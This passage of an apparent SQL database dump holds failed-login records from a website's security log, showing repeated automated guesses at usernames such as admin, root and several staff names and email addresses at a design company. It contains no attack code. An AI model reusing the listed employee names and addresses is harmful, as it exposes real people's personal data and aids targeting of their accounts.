Firefox/34.0'),(5998,9017,1630044469.189787,1,'loginFailInvalidUsername','dogstyle',0,'\0\0\0\0\0\0\0\0\0\0��j��','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(5999,9019,1630044479.876594,1,'loginFailInvalidUsername','helen@dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0��C�','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(6000,9020,1630044484.144857,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��6$e','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(6001,9023,1630044496.062573,1,'loginFailInvalidUsername','dogstyle',0,'\0\0\0\0\0\0\0\0\0\0����e�','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(6002,9048,1630063085.606070,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���k�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'),(6003,9052,1630066446.165922,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���3','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6004,9053,1630067551.021825,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����ʰ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6005,9055,1630068958.546370,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���k��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'),(6006,9126,1630120128.772220,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���;U�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36'),(6007,9148,1630156213.658011,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����6*','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(6008,9150,1630159292.525033,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����B','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36'),(6009,9328,1630245001.332253,1,'loginFailInvalidUsername','gary.watson',0,'\0\0\0\0\0\0\0\0\0\0���J_','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(6010,9329,1630245006.998894,1,'loginFailInvalidUsername','gary.watson@dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0���J_','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(6011,9330,1630245009.033571,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���J_','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(6012,9331,1630245014.703489,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0���J_','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(6013,9332,1630245016.963808,1,'loginFailInvalidUsername','dogstardesign',0,'\0\0\0\0\0\0\0\0\0\0���J_','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(6014,9333,1630245021.117118,1,'loginFailInvalidUsername','gazzamia',0,'\0\0\0\0\0\0\0\0\0\0���J_','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(6015,9336,1630245054.934267,1,'loginFailInvalidUsername','gary.watson@dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(6016,9338,1630245077.498824,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0��-��','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(6017,9339,1630245088.692939,1,'loginFailInvalidUsername','dogstardesign',0,'\0\0\0\0\0\0\0\0\0\0����e','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(6018,9354,1630252425.685312,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����q','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(6019,9356,1630253315.633571,1,'loginFailInvalidUsername','marc',0,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'),(6020,9371,1630259640.624780,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��ٮ�i','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36'),(6021,9396,1630267941.754509,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6022,9452,1630288660.172341,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��u�','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36'),(6023,9463,1630292610.261150,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6024,9464,1630292631.885694,1,'loginFailInvalidUsername','twitter',0,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6025,9465,1630292634.344629,1,'loginFailInvalidUsername','user',0,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6026,9466,1630292636.764989,1,'loginFailInvalidUsername','root',0,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6027,9467,1630292638.955781,1,'loginFailInvalidUsername','twitter@dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6028,9468,1630292641.785525,1,'loginFailInvalidUsername','dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6029,9469,1630292646.236926,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6030,9472,1630293343.555273,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����e','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6031,9492,1630300662.224585,1,'loginFailInvalidUsername','twitter',0,'\0\0\0\0\0\0\0\0\0\0��tDo�','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(6032,9493,1630300663.989093,1,'loginFailInvalidUsername','twitter@dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0��tDo�','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(6033,9494,1630300665.815525,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��tDo�','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(6034,9495,1630300667.537841,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0��tDo�','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(6035,9496,1630300669.222336,1,'loginFailInvalidUsername','dogstardesign',0,'\0\0\0\0\0\0\0\0\0\0��tDo�','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(6036,9498,1630300670.890380,1,'loginFailInvalidUsername','dogstyle',0,'\0\0\0\0\0\0\0\0\0\0��tDo�','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(6037,9499,1630300675.103229,1,'loginFailInvalidUsername','dogstyle',0,'\0\0\0\0\0\0\0\0\0\0���r׆','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(6038,9500,1630300682.721540,1,'loginFailInvalidUsername','twitter@dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0��k��','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(6039,9501,1630300689.218448,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���*t','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(6040,9504,1630300706.099780,1,'loginFailInvalidUsername','dogstyle',0,'\0\0\0\0\0\0\0\0\0\0��-���','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(6041,9542,1630315203.677463,1,'loginFailInvalidUsername','dogstardesign',0,'\0\0\0\0\0\0\0\0\0\0�����[','Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53'),(6042,9564,1630323787.615230,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��$\\','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6043,9569,1630325404.760284,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��gR','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6044,9580,1630337413.718626,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���;��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6045,9659,1630352150.311796,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0'),(6046,9708,1630364653.798000,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��[�(n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6047,9709,1630364757.120714,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����q','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36'),(6048,9720,1630367938.021452,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��_�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(6049,9795,1630390627.796498,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��x�@','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6050,9805,1630393581.297944,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����$','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6051,9808,1630393848.940149,1,'loginFailInvalidUsername','simon.davies',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(6052,9809,1630393850.102384,1,'loginFailInvalidUsername','simon.davies@dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(6053,9810,1630393851.548448,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(6054,9811,1630393853.413611,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(6055,9812,1630393854.728828,1,'loginFailInvalidUsername','dogstardesign',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(6056,9813,1630393856.179460,1,'loginFailInvalidUsername','dogstyle',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(6057,9814,1630393862.778788,1,'loginFailInvalidUsername','dogstyle',0,'\0\0\0\0\0\0\0\0\0\0����C','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(6058,9815,1630393881.699529,1,'loginFailInvalidUsername','simon.davies@dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0����e�','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(6059,9816,1630393887.424537,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��Y���','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(6060,9830,1630395565.308313,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��C�2','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6061,9922,1630494125.010786,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���~Y�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36'),(6062,9922,1630494125.103397,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���~Y�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36'),(6063,9923,1630498185.539380,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����S','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727)'),(6064,9925,1630517307.617489,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����:','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0'),(6065,9926,1630529602.678253,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��%�','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0'),(6066,9932,1630565633.539039,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��*u:�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6067,9933,1630565636.006195,1,'loginFailInvalidUsername','twitter',0,'\0\0\0\0\0\0\0\0\0\0��*u:�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6068,9934,1630565638.679668,1,'loginFailInvalidUsername','user',0,'\0\0\0\0\0\0\0\0\0\0��*u:�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6069,9935,1630565641.176727,1,'loginFailInvalidUsername','root',0,'\0\0\0\0\0\0\0\0\0\0��*u:�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6070,9936,1630565643.985976,1,'loginFailInvalidUsername','twitter@dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0��*u:�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6071,9937,1630565646.346760,1,'loginFailInvalidUsername','dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0��*u:�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6072,9938,1630565648.592654,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0��*u:�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6073,9960,1630637310.214259,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��>�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6074,9997,1630650874.897054,1,'loginFailInvalidUsername','simon.davies',0,'\0\0\0\0\0\0\0\0\0\0��M+В','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(6075,9998,1630650875.970469,1,'loginFailInvalidUsername','simon.davies@dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0��M+В','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(6076,9999,1630650876.990856,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��M+В','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(6077,10000,1630650878.028408,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0��M+В','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(6078,10001,1630650879.052851,1,'loginFailInvalidUsername','dogstardesign',0,'\0\0\0\0\0\0\0\0\0\0��M+В','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(6079,10002,1630650880.113338,1,'loginFailInvalidUsername','dogstyle1',0,'\0\0\0\0\0\0\0\0\0\0��M+В','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(6080,10003,1630650887.299656,1,'loginFailInvalidUsername','dogstyle1',0,'\0\0\0\0\0\0\0\0\0\0����e�','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(6081,10004,1630650893.869585,1,'loginFailInvalidUsername','simon.davies@dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0��U�P#','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(6082,10006,1630650904.677545,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0����d','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(6083,10105,1630684488.896076,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��>�q�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6084,10112,1630687191.012906,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���F�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6085,10133,1630697425.879207,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��`}��','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(6086,10137,1630698529.436418,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���;N�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6087,10142,1630699523.268292,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��mFd#','Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; InfoPath.1; SV1; .NET CLR 3.8.36217; WOW64; en-US)'),(6088,10237,1630721776.862088,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��H�*-','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6089,10272,1630730267.464926,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��1���','Mozilla/5.0 (Windows NT 10.0; Win64; x64)'),(6090,10273,1630730275.306290,1,'loginFailInvalidUsername','user1',0,'\0\0\0\0\0\0\0\0\0\0��}�~E','Mozilla/5.0 (Windows NT 10.0; Win64; x64)'),(6091,10273,1630730275.438043,1,'loginFailInvalidUsername','user1',0,'\0\0\0\0\0\0\0\0\0\0��}�~E','Mozilla/5.0 (Windows NT 10.0; Win64; x64)'),(6092,10297,1630735700.371078,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��p�x�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6093,10298,1630735707.604986,1,'loginFailInvalidUsername','simon.davies',0,'\0\0\0\0\0\0\0\0\0\0��p�x�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6094,10299,1630735711.034811,1,'loginFailInvalidUsername','user',0,'\0\0\0\0\0\0\0\0\0\0��p�x�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6095,10300,1630735715.947618,1,'loginFailInvalidUsername','root',0,'\0\0\0\0\0\0\0\0\0\0��p�x�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6096,10301,1630735719.197928,1,'loginFailInvalidUsername','simon.davies@dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0��p�x�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6097,10302,1630735722.928003,1,'loginFailInvalidUsername','dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0��p�x�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6098,10303,1630735726.826708,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0��p�x�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6099,10363,1630746797.947599,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����R�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6100,10409,1630753879.253460,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��y��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6101,10410,1630753883.672889,1,'loginFailInvalidUsername','andrew.marsh',0,'\0\0\0\0\0\0\0\0\0\0��y��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6102,10412,1630753889.076283,1,'loginFailInvalidUsername','user',0,'\0\0\0\0\0\0\0\0\0\0��y��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6103,10413,1630753894.681117,1,'loginFailInvalidUsername','root',0,'\0\0\0\0\0\0\0\0\0\0��y��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6104,10414,1630753899.075592,1,'loginFailInvalidUsername','andrew.marsh@dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0��y��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6105,10415,1630753902.442136,1,'loginFailInvalidUsername','dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0��y��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6106,10416,1630753906.644261,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0��y��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6107,10436,1630757177.186288,1,'loginFailInvalidUsername','dogstardesign',0,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(6108,10471,1630763525.782760,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6109,10472,1630763719.587902,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��ár�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6110,10551,1630778609.809665,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��E��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6111,10561,1630780367.535156,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���]��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6112,10573,1630786435.255416,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���Dd@','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36'),(6113,10602,1630808310.739769,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���E\"�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36'),(6114,10638,1630836623.607442,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���$O','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0'),(6115,10644,1630883910.288418,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���;�','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0'),(6116,10646,1630889366.765964,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��h�H�','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; OfficeLiveConnector.1.3; OfficeLivePatch.1.3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2; MS-RTC LM 8; .NET4.0C)'),(6117,10650,1630922369.248882,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0'),(6118,10650,1630922369.432705,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 